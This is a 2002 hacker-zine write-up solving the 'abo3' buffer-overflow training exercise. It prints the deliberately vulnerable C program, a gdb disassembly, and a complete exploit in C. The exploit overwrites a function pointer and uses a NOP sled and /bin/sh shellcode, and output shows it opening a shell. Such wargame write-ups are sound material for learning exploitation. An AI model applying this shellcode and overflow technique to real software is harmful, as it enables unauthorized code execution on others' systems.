[ The Cult Of Freedom ]
--[ By Fr1c [fr1c@phreakcore.org]
--[ PhreakCore.ORG - 2002
--[ Subject : BufferOverflows - Little bit of thinking! (abo3)

--[ 0x01 ]---- Intro :

I had a little free time, so I decided to write a text or two ... these ABOs happened to be at hand, so here we go ... :)
Heh, some people are probably already bored with buffer overflows, i.e. exploiting these simple examples ... me too by now :)
Hm, but I see that some people were/are keen on those ABOs from core-sdi.com ...
I explained why it is not possible to exploit ABO2 (everybody has probably solved abo1 by now :) ) ... i.e. abo2 is not possible on the x86 platform, but on RISC it is ...
Anyway, I picked up abo3 and took a look ...

--[ 0x02 ]---- Work :

It is basically simple, so here it is, I solved it ... The source goes like this:

=== CUT HERE ===
/* abo3.c                                                *
 * specially crafted to feed your brain by gera@core-sdi.com */

/* This'll prepare you for The Next Step */

int main(int argv,char **argc) {
        extern system,puts;
        void (*fn)(char*)=(void(*)(char*))&system;
        char buf[256];

        fn=(void(*)(char*))&puts;
        strcpy(buf,argc[1]);
        fn(argc[2]);
        exit(1);
}
=== CUT HERE ===

So ... let's analyse this a bit ... If the code confuses you, go back and read C tuts about pointers!
Anyway, we see again that, yes, it is possible to fill 'buf', but that is no use to us, because the overwritten EIP will never be executed ...
Hm, let's see ... here we have a pointer to a function (fn). And that function is executed before exit() ... hm, it seems that is our way out of here.
Hm, let's have a look at the disassembly:

(gdb) disas main
Dump of assembler code for function main:
0x8048500 : push   %ebp
0x8048501 : mov    %esp,%ebp
0x8048503 : sub    $0x118,%esp
0x8048509 : movl   $0x8048384,0xfffffff4(%ebp)
0x8048510 : movl   $0x8048394,0xfffffff4(%ebp)
0x8048517 : sub    $0x8,%esp
0x804851a : mov    0xc(%ebp),%eax
0x804851d : add    $0x4,%eax
0x8048520 : pushl  (%eax)
0x8048522 : lea    0xfffffee8(%ebp),%eax
0x8048528 : push   %eax
0x8048529 : call   0x80483e4
0x804852e : add    $0x10,%esp
0x8048531 : sub    $0xc,%esp
0x8048534 : mov    0xc(%ebp),%eax
0x8048537 : add    $0x8,%eax
0x804853a : pushl  (%eax)
0x804853c : mov    0xfffffff4(%ebp),%eax
0x804853f : call   *%eax            <-- this is what we are aiming at!
0x8048541 : add    $0x10,%esp
0x8048544 : sub    $0xc,%esp
0x8048547 : push   $0x1
0x8048549 : call   0x80483d4
0x804854e : mov    %esi,%esi
End of assembler dump.
(gdb)

Hm, yes ... we could try to overwrite the return address of this function ...
Anyway, here is my solution, analyse it a bit and you will figure it out ... it is very simple.

=== CUT HERE ===
/* Solution for ABO3.C
 * By Fr1c [PhreakCore]
 */

#include <stdio.h>
#include <string.h>
#include <unistd.h>

/* buf sits at ebp-0x118 and fn at ebp-0xc in the disassembly above,
 * i.e. 0x10c (268) bytes apart; 272 bytes reaches over fn as well */
#define SIZE 272 /* got from predator ( i think :) )! */

char shellcode[] =
        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
        "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
        "\x80\xe8\xdc\xff\xff\xff/bin/sh";

/* returns the current stack pointer (value left in %eax) */
unsigned long get_esp(void)
{
        __asm__("movl %esp, %eax");
}

int main(void)
{
        char buffer[SIZE];
        int i;
        unsigned long ret = get_esp()-87;

        /* fill the whole buffer with the guessed address ... */
        for (i = 0; i < SIZE; i+=4)
                *(long *)&buffer[i] = ret;

        /* ... then put a NOP sled and the shellcode in front of it */
        memset(buffer, 0x90, 200);
        memcpy(buffer+200, shellcode, strlen(shellcode));

        printf("Fritz-Lab\nExploiting abo3!\n");
        execl("./abo3", "abo3", buffer, NULL);
        return 0;
}
=== CUT HERE ===

Heh, no emails about this plz ... :))

[fritz@fritz-lab ]$ ./abo3x
Fritz-Lab
Exploiting abo3!
sh-2.04$

b00m ... looks like it's working ...!? :)

take care ....

--------
Greetz : ugh, sorry, I'm tired ... I can't even remember my own nick :)))